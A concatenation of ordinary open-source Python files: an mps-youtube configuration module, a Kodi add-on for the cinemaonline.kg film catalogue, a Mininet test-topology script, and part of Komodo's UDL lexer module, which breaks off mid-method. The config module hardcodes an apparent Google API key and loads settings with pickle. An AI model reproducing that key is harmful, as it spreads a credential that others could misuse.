ConfigItem("lastfm_password", '', check_fn=check_lastfm_password),
ConfigItem("lastfm_api_key", ''),
ConfigItem("lastfm_api_secret", ''),
ConfigItem("audio_format", "auto",
allowed_values="auto webm m4a".split()),
ConfigItem("video_format", "auto",
allowed_values="auto webm mp4 3gp".split()),
ConfigItem("api_key", "AIzaSyCIM4EzNqi1in22f4Z3Ru3iYvLaY8tc3bo",
check_fn=check_api_key),
ConfigItem("autoplay", False),
ConfigItem("set_title", True),
ConfigItem("mpris", not mswin),
]
def __getitem__(self, key):
# TODO: Possibly more efficient algorithm, w/ caching
for i in self._configitems:
if i.name.upper() == key:
return i
raise KeyError
def __getattr__(self, name):
try:
return self[name]
except KeyError:
raise AttributeError
def __iter__(self):
return (i.name.upper() for i in self._configitems)
def save(self):
""" Save current config to file. """
config = {setting: self[setting].value for setting in self}
with open(g.CFFILE, "wb") as cf:
pickle.dump(config, cf, protocol=2)
util.dbg(c.p + "Saved config: " + g.CFFILE + c.w)
def load(self):
""" Override config if config file exists. """
if os.path.exists(g.CFFILE):
with open(g.CFFILE, "rb") as cf:
saved_config = pickle.load(cf)
for k, v in saved_config.items():
try:
self[k].value = v
except KeyError: # Ignore unrecognised data in config
util.dbg("Unrecognised config item: %s", k)
# Update config files from versions <= 0.01.41
if isinstance(self.PLAYERARGS.get, list):
self.WINDOW_POS.value = "top-right"
redundant = ("-really-quiet --really-quiet -prefer-ipv4 -nolirc "
"-fs --fs".split())
for r in redundant:
util.dbg("removing redundant arg %s", r)
util.list_update(r, self.PLAYERARGS.value, remove=True)
self.PLAYERARGS.value = " ".join(self.PLAYERARGS.get)
self.save()
Config = _Config()
del _Config # _Config is a singleton and should not have more instances
# Prevent module from being deleted
# http://stackoverflow.com/questions/5365562/why-is-the-value-of-name-changing-after-assignment-to-sys-modules-name
ref = sys.modules[__name__]
# Any module trying to import config will get the Config object instead
sys.modules[__name__] = Config
| np1/mps-youtube | mps_youtube/config.py | Python | gpl-3.0 | 13,150 | 0.001217 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import urllib2, re, json, time, xbmc, traceback
from _header import *
BASE_URL = 'http://cinemaonline.kg/'
BASE_NAME = 'Cinema Online'
BASE_LABEL = 'oc'
GA_CODE = 'UA-34889597-1'
NK_CODE = '1744'
def default_oc_noty():
plugin.notify('Сервер недоступен', BASE_NAME, image=get_local_icon('noty_' + BASE_LABEL))
def get_oc_cookie():
result = {'phpsessid': '', 'utmp': '', 'set': ''}
cookie = plugin.get_storage(BASE_LABEL, TTL=1440)
try:
result['phpsessid'] = cookie['phpsessid']
result['utmp'] = cookie['utmp']
result['set'] = cookie['set']
except:
try:
a = common.fetchPage({'link': BASE_URL})
b = common.fetchPage({'link': BASE_URL + 'cinema.png?' + str(int(time.time()))})
cookie['set'] = a['header']['Set-Cookie'] + '; ' + b['header']['Set-Cookie']
result['set'] = cookie['set']
cookies = common.getCookieInfoAsHTML()
cookie['phpsessid'] = common.parseDOM(cookies, 'cookie', attrs={'name': 'PHPSESSID'}, ret='value')[0]
try:
cookie['utmp'] = common.parseDOM(cookies, 'cookie', attrs={'name': '_utmp'}, ret='value')[0]
except:
cookie['utmp'] = common.parseDOM(cookies, 'cookie', attrs={'name': '__utmp'}, ret='value')[0]
result['phpsessid'] = cookie['phpsessid']
result['utmp'] = cookie['utmp']
except:
pass
return result
COOKIE = '' # get_oc_cookie()
BASE_API_URL = BASE_URL + 'api.php?format=json' # &' + COOKIE['phpsessid'] + '&JsHttpRequest='+str(int(time.time()))+'-xml'
@plugin.route('/site/' + BASE_LABEL)
def oc_index():
items = [{
'label': set_color('[ Поиск ]', 'dialog', True),
'path': plugin.url_for('oc_search'),
'icon': get_local_icon('find')
}, {
'label': set_color('Новинки на CinemaOnline', 'light'),
'path': plugin.url_for('oc_category', id=0)
}, {
'label': set_color('По жанрам', 'bold'),
'path': plugin.url_for('oc_genres')
}, {
'label': 'Бестселлеры',
'path': plugin.url_for('oc_bestsellers')
}, {
'label': 'Лучшие по версии IMDB',
'path': plugin.url_for('oc_category', id=2)
}, {
'label': 'Лучшие по версии КиноПоиск',
'path': plugin.url_for('oc_category', id=9)
}]
return items
@plugin.route('/site/' + BASE_LABEL + '/genre')
def oc_genres():
item_list = get_genres()
items = [{
'label': item['label'],
'path': plugin.url_for('oc_genre', id=item['id'])
} for item in item_list]
return items
@plugin.route('/site/' + BASE_LABEL + '/bestsellers')
def oc_bestsellers():
item_list = get_bestsellers()
items = [{
'label': item['label'],
'path': plugin.url_for('oc_movie', id=item['id']),
'icon': item['icon'],
} for item in item_list]
return items
@plugin.route('/site/' + BASE_LABEL + '/genre/<id>')
def oc_genre(id):
item_list = get_genre_movie_list(id)
items = [{
'label': item['label'],
'path': plugin.url_for('oc_movie', id=item['id']),
'properties': item['properties'],
'icon': item['icon'],
} for item in item_list['items']]
if (item_list['sys_items']):
items = add_pagination(items, item_list['sys_items'], 'oc_genre_pagination', id)
return items
@plugin.route('/site/' + BASE_LABEL + '/genre/<id>/<page>')
def oc_genre_pagination(id, page='1'):
page = int(page)
item_list = get_genre_movie_list(id, page)
items = [{
'label': item['label'],
'path': plugin.url_for('oc_movie', id=item['id']),
'properties': item['properties'],
'icon': item['icon'],
} for item in item_list['items']]
if (item_list['sys_items']):
items = add_pagination(items, item_list['sys_items'], 'oc_genre_pagination', id)
return plugin.finish(items, update_listing=True)
@plugin.route('/site/' + BASE_LABEL + '/category/<id>')
def oc_category(id):
item_list = get_movie_list(id)
items = [{
'label': item['label'],
'path': plugin.url_for('oc_movie', id=item['id']),
'properties': item['properties'],
'icon': item['icon'],
} for item in item_list['items']]
if (item_list['sys_items']):
items = add_pagination(items, item_list['sys_items'], 'oc_category_pagination', id)
return items
@plugin.route('/site/' + BASE_LABEL + '/category/<id>/<page>')
def oc_category_pagination(id, page='1'):
page = int(page)
item_list = get_movie_list(id, page)
items = [{
'label': item['label'],
'path': plugin.url_for('oc_movie', id=item['id']),
'properties': item['properties'],
'icon': item['icon'],
} for item in item_list['items']]
if (item_list['sys_items']):
items = add_pagination(items, item_list['sys_items'], 'oc_category_pagination', id)
return plugin.finish(items, update_listing=True)
@plugin.route('/site/' + BASE_LABEL + '/to_page/category/<id>/<page>')
def oc_go_to_page(id, page=1):
search_page = common.getUserInputNumbers('Укажите страницу')
if (search_page):
search_page = int(search_page) - 1 if (int(search_page) > 0) else 1
item_list = get_movie_list(id, search_page)
items = [{
'label': item['label'],
'path': plugin.url_for('oc_movie', id=item['id']),
'properties': item['properties'],
'icon': item['icon'],
} for item in item_list['items']]
if (item_list['sys_items']):
for item in item_list['sys_items']:
items.insert(0, {
'label': item['label'],
'path': plugin.url_for('oc_go_to_page', id=id, page=item['page']) if (
item['search'] == True ) else plugin.url_for('oc_category_pagination', id=id,
page=item['page']),
'icon': item['icon']
})
return plugin.finish(items, update_listing=True)
else:
plugin.redirect('plugin://' + plugin.id + '/site/' + BASE_LABEL + '/category/' + id + '/' + str(int(page) - 1))
@plugin.route('/site/' + BASE_LABEL + '/movie/<id>')
def oc_movie(id):
item_list = get_movie(id)
# xbmc.log('Item list: ' + str(item_list))
items = [{
# 'title' : item['label'],
'label': item['label'],
'path': item['url'],
'thumbnail': item['icon'],
'properties': item['properties'],
'is_playable': True
} for item in item_list['items']]
if (item_list['playlist']):
# xbmc.log('Item list play: ' + str(item_list['items']))
kgontv_playlist(item_list['items'])
xbmc.executebuiltin('ActivateWindow(VideoPlaylist)')
else:
# xbmc.log('Item play: ' + str(items))
return items
@plugin.route('/site/' + BASE_LABEL + '/search')
def oc_search():
search_val = plugin.keyboard('', 'Что ищете?')
if (search_val):
item_list = get_search_results(str(search_val))
items = [{
'label': item['label'],
'path': plugin.url_for('oc_movie', id=item['id']),
'icon': item['icon'],
} for item in item_list]
return items
else:
plugin.redirect('plugin://' + plugin.id + '/site/' + BASE_LABEL)
# method
def get_bestsellers():
items = []
try:
result = common.fetchPage({'link': BASE_API_URL, 'post_data': {'action[0]': 'Video.getBestsellers'}})
kg_stats(BASE_URL, GA_CODE, NK_CODE)
if result['status'] == 200:
html = result['content']
data = json.loads(html)
for item in data['json'][0]['response']['bestsellers']:
for video in item['movies']:
label = video['name'] + ' [' + item['name'] + ']'
icon = BASE_URL + video['cover']
video_id = video['movie_id']
items.append({
'label': label,
'icon': icon,
'id': video_id
})
except:
default_oc_noty()
return items
# method
def get_genres():
items = []
try:
result = common.fetchPage({'link': BASE_API_URL, 'post_data': {'action[0]': 'Video.getGenres'}})
kg_stats(BASE_URL, GA_CODE, NK_CODE)
if result['status'] == 200:
html = result['content']
data = json.loads(html)
for item in data['json'][0]['response']['genres']:
items.append({
'label': item['name'],
'id': item['id']
})
except:
default_oc_noty()
return items
# method
def get_movie_list(order_id, page='0'):
sys_items = []
items = []
size = 40
try:
offset = int(page) * size
result = common.fetchPage({'link': BASE_API_URL,
'post_data': {'action[0]': 'Video.getCatalog', 'offset[0]': str(offset),
'size[0]': str(size), 'order[0]': order_id}})
kg_stats(BASE_URL, GA_CODE, NK_CODE)
if result['status'] == 200:
data = json.loads(result['content'])
data = data['json'][0]['response']
# ======== pagination ========#
sys_items = KG_get_pagination((offset / size + 1), total=data['total'], size=size, offset=1)
# ======== END pagination ========#
megogo = False
for item in data['movies']:
try:
try:
genres = ' [' + ', '.join(item['genres'][:3]) + ']'
except:
genres = ''
if 'Megogo' not in item['genres']:
imdb = {'rating': '0', 'votes': '0'}
kinopoisk = {'rating': '0', 'votes': '0'}
if ('rating_imdb_value' in item):
imdb = {'rating': item['rating_imdb_value'], 'votes': item['rating_imdb_count']}
if ('rating_kinopoisk_value' in item):
kinopoisk = {'rating': item['rating_kinopoisk_value'],
'votes': item['rating_kinopoisk_count']}
rating = ''
if (imdb['rating'] != '0' and kinopoisk['rating'] != '0'):
rating = ' ' + imdb['rating'] + ' (' + imdb['votes'] + ') / ' + kinopoisk[
'rating'] + ' (' + kinopoisk['votes'] + ')'
country = ''
if ('countries' in item):
country = item['countries'][0]
properties = {
'Country': country,
'PlotOutline': item['description'],
'Plot': item['long_description'],
'Year': item['year'],
'Rating': imdb['rating'],
'Votes': imdb['votes']
}
country = ' (' + country + ')' if (country) else ''
label = common.replaceHTMLCodes('[B]' + item['name'] + '[/B]' + country + genres + rating)
icon = BASE_URL + item['cover']
video_id = item['movie_id']
items.append({
'label': label,
'icon': icon,
'properties': properties,
'id': video_id
})
else:
megogo = True
except:
pass
# if megogo: plugin.notify('Megogo пропущен', BASE_NAME, 1000, get_local_icon('noty_' + BASE_LABEL))
except:
default_oc_noty()
return {'items': items, 'sys_items': sys_items}
# method
def get_genre_movie_list(genre, page='0'):
sys_items = []
items = []
size = 40
order_id = 0
try:
offset = int(page) * size
result = common.fetchPage({'link': BASE_API_URL,
'post_data': {'action[0]': 'Video.getCatalog', 'offset[0]': str(offset),
'size[0]': str(size), 'order[0]': order_id, 'genre[0]': genre}})
kg_stats(BASE_URL, GA_CODE, NK_CODE)
if result['status'] == 200:
data = json.loads(result['content'])
data = data['json'][0]['response']
# ======== pagination ========#
sys_items = KG_get_pagination((offset / size + 1), total=data['total'], size=size, offset=1)
# ======== END pagination ========#
megogo = False
for item in data['movies']:
try:
try:
genres = ' [' + ', '.join(item['genres'][:3]) + ']'
except:
genres = ''
if 'Megogo' not in item['genres']:
imdb = {'rating': '0', 'votes': '0'}
kinopoisk = {'rating': '0', 'votes': '0'}
if ('rating_imdb_value' in item):
imdb = {'rating': item['rating_imdb_value'], 'votes': item['rating_imdb_count']}
if ('rating_kinopoisk_value' in item):
kinopoisk = {'rating': item['rating_kinopoisk_value'],
'votes': item['rating_kinopoisk_count']}
rating = ''
if (imdb['rating'] != '0' and kinopoisk['rating'] != '0'):
rating = ' ' + imdb['rating'] + ' (' + imdb['votes'] + ') / ' + kinopoisk[
'rating'] + ' (' + kinopoisk['votes'] + ')'
country = ''
if ('countries' in item):
country = item['countries'][0]
properties = {
'Country': country,
'PlotOutline': item['description'],
'Plot': item['long_description'],
'Year': item['year'],
'Rating': imdb['rating'],
'Votes': imdb['votes']
}
country = ' (' + country + ')' if (country) else ''
label = common.replaceHTMLCodes('[B]' + item['name'] + '[/B]' + country + genres + rating)
icon = BASE_URL + item['cover']
video_id = item['movie_id']
items.append({
'label': label,
'icon': icon,
'properties': properties,
'id': video_id
})
else:
megogo = True
except:
pass
# if megogo: plugin.notify('Megogo пропущен', BASE_NAME, 1000, get_local_icon('noty_' + BASE_LABEL))
except:
default_oc_noty()
return {'items': items, 'sys_items': sys_items}
# method
def get_search_results(search_value=''):
items = []
try:
result = common.fetchPage({'link': BASE_URL + 'suggestion.php?q=' + urllib2.quote(search_value)})
kg_stats(BASE_URL, GA_CODE, NK_CODE)
if result['status'] == 200:
data = json.loads(result['content'])
data = data['json'][0]['response']
for item in data['movies']:
try:
label = item['name'] + ' | ' + item['international_name'] + ' (' + item['year'] + ')'
icon = BASE_URL + item['cover']
video_id = item['movie_id']
items.append({
'label': common.replaceHTMLCodes(label),
'icon': icon,
'id': video_id
})
except:
pass
except:
default_oc_noty()
return items
# method
def get_movie(id):
items = []
try:
result = common.fetchPage(
{'link': BASE_API_URL, 'post_data': {'action[0]': 'Video.getMovie', 'movie_id[0]': id}})
kg_stats(BASE_URL, GA_CODE, NK_CODE)
if result['status'] == 200:
data = json.loads(result['content'])
item = data['json'][0]['response']['movie']
icon = BASE_URL + item['covers'][0]['original']
try:
trailer = item['trailer']
try:
name = trailer['name']
except:
name = 'Трейлер'
items.append({
'title': name,
'label': name,
'icon': get_local_icon('kinopoisk'),
'properties': {'fanart_image': trailer['preview']},
'url': trailer['video']
})
except:
pass
for video in item['files']:
try:
label = item['name'] + ': ' + video['name']
url = get_playable_url(video['path']) + UserAgent
try:
fan = video['frames'][0]
except:
fan = ''
properties = {
'duration': video['metainfo']['playtime'],
'fanart_image': fan,
}
items.append({
'title': label,
'label': set_color('ПРОСМОТР: ', 'bold').decode('utf-8') + label,
'icon': icon,
'properties': properties,
'url': url
})
except:
# xbmc.log('Exception : ' + str(traceback.format_exc()))
continue
try:
for other in item['other_movies']:
try:
try:
fan = BASE_URL + other['cover']
except:
fan = ''
properties = {
'fanart_image': fan,
}
items.append({
'title': other['name'],
'label': set_color('ЕЩЕ: ', 'bold').decode('utf-8') + other['name'],
'icon': fan,
'properties': properties,
'url': plugin.url_for('oc_movie', id=other['movie_id'])
})
except:
# xbmc.log('Exception : ' + str(traceback.format_exc()))
continue
except:
# xbmc.log('Exception : ' + str(traceback.format_exc()))
pass
except:
default_oc_noty()
# xbmc.log('Exit list : ' + str(items))
return {'items': items, 'playlist': True if (len(items) > 1) else False}
def get_playable_url(url):
return str(url).replace('/home/video/', 'http://p0.oc.kg:8080/')
| delletenebre/xbmc-addon-kilogramme | plugin.video.kilogramme/resources/lib/site_ockg.py | Python | gpl-3.0 | 20,423 | 0.0036 |
#!/usr/bin/python
NWID=1
NR_NODES=20
#Controllers=[{"ip":'127.0.0.1', "port":6633}, {"ip":'10.0.1.28', "port":6633}]
Controllers=[{"ip":'10.0.1.28', "port":6633}]
"""
Start up a Simple topology
"""
from mininet.net import Mininet
from mininet.node import Controller, RemoteController
from mininet.log import setLogLevel, info, error, warn, debug
from mininet.cli import CLI
from mininet.topo import Topo
from mininet.util import quietRun
from mininet.moduledeps import pathCheck
from mininet.link import Link, TCLink
from sys import exit
import os.path
from subprocess import Popen, STDOUT, PIPE
import sys
#import argparse
class MyController( Controller ):
def __init__( self, name, ip='127.0.0.1', port=6633, **kwargs):
"""Init.
name: name to give controller
ip: the IP address where the remote controller is
listening
port: the port where the remote controller is listening"""
Controller.__init__( self, name, ip=ip, port=port, **kwargs )
def start( self ):
"Overridden to do nothing."
return
def stop( self ):
"Overridden to do nothing."
return
def checkListening( self ):
"Warn if remote controller is not accessible"
listening = self.cmd( "echo A | telnet -e A %s %d" %
( self.ip, self.port ) )
if 'Unable' in listening:
warn( "Unable to contact the remote controller"
" at %s:%d\n" % ( self.ip, self.port ) )
class SDNTopo( Topo ):
"SDN Topology"
def __init__( self, *args, **kwargs ):
Topo.__init__( self, *args, **kwargs )
switch = []
host = []
root = []
for i in range (NR_NODES):
name_suffix = '%02d' % NWID + "." + '%02d' % i
dpid_suffix = '%02x' % NWID + '%02x' % i
dpid = '0000' + '0000' + '0000' + dpid_suffix
sw = self.addSwitch('sw'+name_suffix, dpid=dpid)
switch.append(sw)
for i in range (NR_NODES):
host.append(self.addHost( 'host%d' % i ))
for i in range (NR_NODES):
root.append(self.addHost( 'root%d' % i, inNamespace=False ))
for i in range (NR_NODES):
self.addLink(host[i], switch[i])
for i in range (1, NR_NODES):
self.addLink(switch[0], switch[i])
for i in range (NR_NODES):
self.addLink(root[i], host[i])
def startsshd( host ):
"Start sshd on host"
info( '*** Starting sshd\n' )
name, intf, ip = host.name, host.defaultIntf(), host.IP()
banner = '/tmp/%s.banner' % name
host.cmd( 'echo "Welcome to %s at %s" > %s' % ( name, ip, banner ) )
host.cmd( '/usr/sbin/sshd -o "Banner %s"' % banner, '-o "UseDNS no"' )
info( '***', host.name, 'is running sshd on', intf, 'at', ip, '\n' )
def startsshds ( hosts ):
for h in hosts:
startsshd( h )
def stopsshd( ):
"Stop *all* sshd processes with a custom banner"
info( '*** Shutting down stale sshd/Banner processes ',
quietRun( "pkill -9 -f Banner" ), '\n' )
def sdnnet(opt):
topo = SDNTopo()
info( '*** Creating network\n' )
#net = Mininet( topo=topo, controller=MyController, link=TCLink)
net = Mininet( topo=topo, link=TCLink, build=False)
controllers=[]
for c in Controllers:
rc = RemoteController('c%d' % Controllers.index(c), ip=c['ip'],port=c['port'])
print "controller ip %s port %s" % (c['ip'], c['port'])
controllers.append(rc)
net.controllers=controllers
net.build()
host = []
for i in range (NR_NODES):
host.append(net.get( 'host%d' % i ))
net.start()
sw=net.get('sw01.00')
print "center sw", sw
sw.attach('tapa0')
for i in range (NR_NODES):
host[i].defaultIntf().setIP('192.168.%d.%d/16' % (NWID,i))
root = []
for i in range (NR_NODES):
root.append(net.get( 'root%d' % i ))
for i in range (NR_NODES):
host[i].intf('host%d-eth1' % i).setIP('1.1.%d.1/24' % i)
root[i].intf('root%d-eth0' % i).setIP('1.1.%d.2/24' % i)
stopsshd ()
startsshds ( host )
if opt=="cli":
CLI(net)
stopsshd()
net.stop()
if __name__ == '__main__':
setLogLevel( 'info' )
if len(sys.argv) == 1:
sdnnet("cli")
elif len(sys.argv) == 2 and sys.argv[1] == "-n":
sdnnet("nocli")
else:
print "%s [-n]" % sys.argv[0]
| opennetworkinglab/spring-open | old-scripts/test-network/mininet/net.sprint5-templete.py | Python | apache-2.0 | 4,452 | 0.02628 |
#!python
# ***** BEGIN LICENSE BLOCK *****
# Version: MPL 1.1/GPL 2.0/LGPL 2.1
#
# The contents of this file are subject to the Mozilla Public License
# Version 1.1 (the "License"); you may not use this file except in
# compliance with the License. You may obtain a copy of the License at
# http://www.mozilla.org/MPL/
#
# Software distributed under the License is distributed on an "AS IS"
# basis, WITHOUT WARRANTY OF ANY KIND, either express or implied. See the
# License for the specific language governing rights and limitations
# under the License.
#
# The Original Code is Komodo code.
#
# The Initial Developer of the Original Code is ActiveState Software Inc.
# Portions created by ActiveState Software Inc are Copyright (C) 2000-2007
# ActiveState Software Inc. All Rights Reserved.
#
# Contributor(s):
# ActiveState Software Inc
#
# Alternatively, the contents of this file may be used under the terms of
# either the GNU General Public License Version 2 or later (the "GPL"), or
# the GNU Lesser General Public License Version 2.1 or later (the "LGPL"),
# in which case the provisions of the GPL or the LGPL are applicable instead
# of those above. If you wish to allow use of your version of this file only
# under the terms of either the GPL or the LGPL, and not to allow others to
# use your version of this file under the terms of the MPL, indicate your
# decision by deleting the provisions above and replace them with the notice
# and other provisions required by the GPL or the LGPL. If you do not delete
# the provisions above, a recipient may use your version of this file under
# the terms of any one of the MPL, the GPL or the LGPL.
#
# ***** END LICENSE BLOCK *****
"""UDL (User-Defined Language) support for codeintel."""
import os
from os.path import dirname, join, abspath, normpath, basename, exists
import sys
import re
import logging
import threading
import operator
import traceback
from pprint import pprint, pformat
import SilverCity
from SilverCity import ScintillaConstants
from SilverCity.ScintillaConstants import * # XXX import only what we need
from SilverCity.Lexer import Lexer
from codeintel2.common import *
from codeintel2.citadel import CitadelBuffer
# from codeintel2.javascript_common import trg_from_pos as
# javascript_trg_from_pos
if _xpcom_:
from xpcom import components
from xpcom.server import UnwrapObject
import directoryServiceUtils
log = logging.getLogger("codeintel.udl")
# log.setLevel(logging.DEBUG)
# XXX We need to have a better mechanism for rationalizing and sharing
# common lexer style classes. For now we'll just HACKily grab from
# Komodo's styles.py. Some of this is duplicating logic in
# KoLanguageServiceBase.py.
_ko_src_dir = normpath(join(dirname(__file__), *([os.pardir]*3)))
sys.path.insert(0, join(_ko_src_dir, "schemes"))
try:
import styles
finally:
del sys.path[0]
del _ko_src_dir
#---- module interface
# Test 'udl/general/is_udl_x_style' tests these.
def is_udl_m_style(style):
return (ScintillaConstants.SCE_UDL_M_DEFAULT <= style
<= ScintillaConstants.SCE_UDL_M_COMMENT)
def is_udl_css_style(style):
return (ScintillaConstants.SCE_UDL_CSS_DEFAULT <= style
<= ScintillaConstants.SCE_UDL_CSS_OPERATOR)
def is_udl_csl_style(style):
return (ScintillaConstants.SCE_UDL_CSL_DEFAULT <= style
<= ScintillaConstants.SCE_UDL_CSL_REGEX)
def is_udl_ssl_style(style):
return (ScintillaConstants.SCE_UDL_SSL_DEFAULT <= style
<= ScintillaConstants.SCE_UDL_SSL_VARIABLE)
def is_udl_tpl_style(style):
return (ScintillaConstants.SCE_UDL_TPL_DEFAULT <= style
<= ScintillaConstants.SCE_UDL_TPL_VARIABLE)
# XXX Redundant code from koUDLLanguageBase.py::KoUDLLanguage
# Necessary because SilverCity.WordList splits input on white-space
_re_bad_filename_char = re.compile(r'([% \x80-\xff])')
def _lexudl_path_escape(m):
return '%%%02X' % ord(m.group(1))
def _urlescape(s):
return _re_bad_filename_char.sub(_lexudl_path_escape, s)
class UDLLexer(Lexer):
"""LexUDL wants the path to the .lexres file as the first element of
the first keywords list.
"""
_lock = threading.Lock()
_lexresfile_from_lang = None
_extra_lexer_dirs = set()
def __init__(self):
self._properties = SilverCity.PropertySet()
self._lexer = SilverCity.find_lexer_module_by_id(
ScintillaConstants.SCLEX_UDL)
lexres_path = _urlescape(self._get_lexres_path())
log.debug("escaped lexres_path: %r", lexres_path)
self._keyword_lists = [
SilverCity.WordList(lexres_path),
]
def tokenize_by_style(self, text, call_back=None):
"""LexUDL.cxx currently isn't thread-safe."""
self._lock.acquire()
try:
return Lexer.tokenize_by_style(self, text, call_back)
finally:
self._lock.release()
@staticmethod
def add_extra_lexer_dirs(dirs):
UDLLexer._extra_lexer_dirs.update(dirs)
UDLLexer._lexresfile_from_lang = None
if _xpcom_:
# Presume we are running under Komodo. Look in the available
# lexres dirs from extensions.
@staticmethod
def _generate_lexer_mapping():
"""Return dict {name > filename} of all lexer resource files (i.e.
those ones that can include compiled UDL .lexres files).
It yields directories that should "win" first.
"""
from glob import glob
lexresfile_from_lang = {}
koDirs = components.classes["@activestate.com/koDirs;1"] \
.getService(components.interfaces.koIDirs)
# Find all possible lexer dirs.
lexer_dirs = []
lexer_dirs.append(join(koDirs.userDataDir, "lexers")) # user
for extensionDir in directoryServiceUtils.getExtensionDirectories():
lexer_dirs.append(join(
extensionDir, "lexers")) # user-install extensions
lexer_dirs.append(join(
koDirs.commonDataDir, "lexers")) # site/common
lexer_dirs.append(join(koDirs.supportDir, "lexers")) # factory
for extra_dir in UDLLexer._extra_lexer_dirs:
lexer_dirs.append(extra_dir)
# Find all .lexeres files in these lexer dirs.
for d in reversed(lexer_dirs): # first come, first served
lexer_files = glob(join(d, "*.lexres"))
for f in lexer_files:
# Get lowered name without the ".lexres" extension.
name = basename(f).lower().rsplit(".", 1)[0]
lexresfile_from_lang[name] = f
return lexresfile_from_lang
else:
@staticmethod
def _generate_lexer_mapping():
"""Return dict {name > filename} of all lexer resource files (i.e.
those ones that can include compiled UDL .lexres files).
It yields directories that should "win" first.
"""
from glob import glob
lexresfile_from_lang = {}
# Find all possible lexer dirs.
lexer_dirs = []
lexer_dirs.append(join(dirname(__file__), "lexers"))
for extra_dir in UDLLexer._extra_lexer_dirs:
lexer_dirs.append(extra_dir)
# Find all .lexeres files in these lexer dirs.
for d in reversed(lexer_dirs): # first come, first served
lexer_files = glob(join(d, "*.lexres"))
for f in lexer_files:
# Get lowered name without the ".lexres" extension.
name = basename(f).lower().rsplit(".", 1)[0]
lexresfile_from_lang[name] = f
return lexresfile_from_lang
def _get_lexres_path(self):
lexresfile_from_lang = UDLLexer._lexresfile_from_lang
if lexresfile_from_lang is None:
# Generate and cache it.
lexresfile_from_lang = self._generate_lexer_mapping()
UDLLexer._lexresfile_from_lang = lexresfile_from_lang
lexres_file = lexresfile_from_lang.get(self.lang.lower())
if lexres_file is None:
raise CodeIntelError("could not find lexres file for %s: "
"`%s.lexres' does not exist in any "
"of the lexer dirs"
% (self.lang, self.lang))
return lexres_file
class UDLBuffer(CitadelBuffer):
"""A CodeIntel Buffer for a UDL-lexer-based language."""
sce_prefixes = ["SCE_UDL_"]
# XXX Not sure that this indirection will be useful, but we'll see.
# Sub-classes must set the following of these that are appropriate:
m_lang = None
css_lang = None
csl_lang = None
ssl_lang = None
tpl_lang = None
def lang_from_style(self, style):
if (ScintillaConstants.SCE_UDL_M_DEFAULT <= style
<= ScintillaConstants.SCE_UDL_M_COMMENT):
return self.m_lang
elif (ScintillaConstants.SCE_UDL_CSS_DEFAULT <= style
<= ScintillaConstants.SCE_UDL_CSS_OPERATOR):
return self.css_lang
elif (ScintillaConstants.SCE_UDL_CSL_DEFAULT <= style
<= ScintillaConstants.SCE_UDL_CSL_REGEX):
return self.csl_lang
elif (ScintillaConstants.SCE_UDL_SSL_DEFAULT <= style
<= ScintillaConstants.SCE_UDL_SSL_VARIABLE):
return self.ssl_lang
elif (ScintillaConstants.SCE_UDL_TPL_DEFAULT <= style
<= ScintillaConstants.SCE_UDL_TPL_VARIABLE):
return self.tpl_lang
else:
raise ValueError("unknown UDL style: %r" % style)
def lang_from_pos(self, pos):
style = self.accessor.style_at_pos(pos)
return self.lang_from_style(style)
_udl_family_from_lang_cache = None
@property
def udl_family_from_lang(self):
if self._udl_family_from_lang_cache is None:
self._udl_family_from_lang_cache = dict(
(uf, L) for (uf, L) in [
(self.m_lang, "M"),
(self.css_lang, "CSS"),
(self.csl_lang, "CSL"),
(self.ssl_lang, "SSL"),
(self.tpl_lang, "TPL"),
]
if L is not None
)
return self._udl_family_from_lang_cache
def text_chunks_from_lang(self, lang):
"""Generate a list of text chunks of the given language content.
For a single-language buffer this is trivial: 1 chunk of the whole
buffer. For multi-language buffers, less so.
Generates 2-tuples:
(POSITION-OFFSET, TEXT-CHUNK)
"""
udl_family_from_lang = self.udl_family_from_lang
if len(udl_family_from_lang) == 1:
yield 0, self.accessor.text
elif lang not in udl_family_from_lang:
pass
elif hasattr(self.accessor, "udl_family_chunk_ranges"):
udl_family = self.udl_family_from_lang[lang]
text = self.accessor.text # Note: assuming here that `text` is in *bytes*
for u, start, end in self.accessor.udl_family_chunk_ranges:
if u == udl_family:
yield start, text[start:end]
else:
min_style, max_style = {
self.m_lang: (ScintillaConstants.SCE_UDL_M_DEFAULT,
ScintillaConstants.SCE_UDL_M_COMMENT),
self.css_lang: (ScintillaConstants.SCE_UDL_CSS_DEFAULT,
ScintillaConstants.SCE_UDL_CSS_OPERATOR),
self.csl_lang: (ScintillaConstants.SCE_UDL_CSL_DEFAULT,
ScintillaConstants.SCE_UDL_CSL_REGEX),
self.ssl_lang: (ScintillaConstants.SCE_UDL_SSL_DEFAULT,
ScintillaConstants.SCE_UDL_SSL_VARIABLE),
self.tpl_lang: (ScintillaConstants.SCE_UDL_TPL_DEFAULT,
ScintillaConstants.SCE_UDL_TPL_VARIABLE),
}[lang]
in_chunk = False
pos_offset = None
text = self.accessor.text
for token in self.accessor.gen_tokens():
if in_chunk:
if not (min_style <= token["style"] <= max_style):
# SilverCity indeces are inclusive at the end.
end_index = token["end_index"] + 1
yield pos_offset, text[pos_offset:end_index]
in_chunk = False
else:
if min_style <= token["style"] <= max_style:
in_chunk = True
pos_offset = token["start_index"]
if in_chunk:
yield pos_offset, text[pos_offset:]
def scoperef_from_pos(self, pos):
"""Return the scoperef for the given position in this buffer.
A "scoperef" is a 2-tuple:
(<blob>, <lpath>)
where <blob> is the ciElementTree blob for the buffer content
and <lpath> is an ordered list of names into the blob
identifying the scope.
If no relevant scope is found (e.g. for example, in markup
content in PHP) then None is returned.
See Buffer.scoperef_from_pos() docstring for more details.
"""
lang = self.lang_from_pos(pos)
try:
blob = self.blob_from_lang[lang]
except KeyError:
return None
line = self.accessor.line_from_pos(pos) + 1 # convert to 1-based
return self.scoperef_from_blob_and_line(blob, line)
def trg_from_pos(self, pos, implicit=True, trigger_type="both"):
if pos == 0:
return None
lang = self.lang_from_pos(pos-1)
if lang is None:
style = self.accessor.style_at_pos(pos)
style_names = self.style_names_from_style_num(style)
raise CodeIntelError("got unexpected style in `%s': %s %s"
% (basename(self.path), style, style_names))
try:
langintel = self.mgr.langintel_from_lang(lang)
except KeyError:
return None
return langintel.trg_from_pos(self, pos, implicit=implicit, trigger_type=trigger_type)
def preceding_trg_from_pos(self, pos, curr_pos, trigger_type="both"):
if curr_pos == 0:
return None
lang = self.lang_from_pos(curr_pos-1)
try:
langintel = self.mgr.langintel_from_lang(lang)
except KeyError:
return None
return langintel.preceding_trg_from_pos(self, pos, curr_pos, trigger_type=trigger_type)
def curr_calltip_arg_range(self, trg_pos, calltip, curr_pos):
if curr_pos == 0:
